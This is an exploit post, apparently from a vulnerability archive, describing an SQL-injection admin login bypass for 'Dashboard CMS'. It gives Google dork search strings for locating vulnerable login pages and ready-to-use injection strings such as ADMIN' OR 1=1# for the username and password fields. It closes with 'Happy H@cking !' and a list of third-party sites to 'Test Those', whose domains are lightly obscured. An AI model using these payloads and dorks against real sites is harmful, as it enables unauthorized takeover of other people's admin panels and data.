Dashboard CMS - Admin Login Bypass

2015.10.08
Credit: FreeBuzz Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

{-} Title => Dashboard CMS - Admin Login Bypass {-} Author => FreeBuzz Team(KinGMasteR) {-} Vulnerable Versions => Mostly the CMS with the 'iChecker' Plugin. {x} Google Dork:: 1 => "Sign in to start your session" inurl:admin/login.php {x} Google Dork:: 2 => "Sign in to start your session" -------------------------------------------------------------------------------------------------------------------------------- User: 'or''=' Pass: 'or''=' OR User: ADMIN' OR 1=1# Pass: ADMIN' OR 1=1# OR Happy H@cking ! -------------------------------------------------------------------------------------------------------------------------------- Test Those : http://giverdXigital.net/login.php http://admXin.wXindsor.edu/ http://kleXio.asia/admin/login.php http://econhXealthcare.net/econ2/ http://fstcaXsh.com/fstcash/login/login.php http://pravas-soXft.com/login.php http://rms.rweXmedia.co.id/ http://www.frienXdspg.com/Admin/login.php {-} Released : 7,October, 2015 # team.freebuzz.ir


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top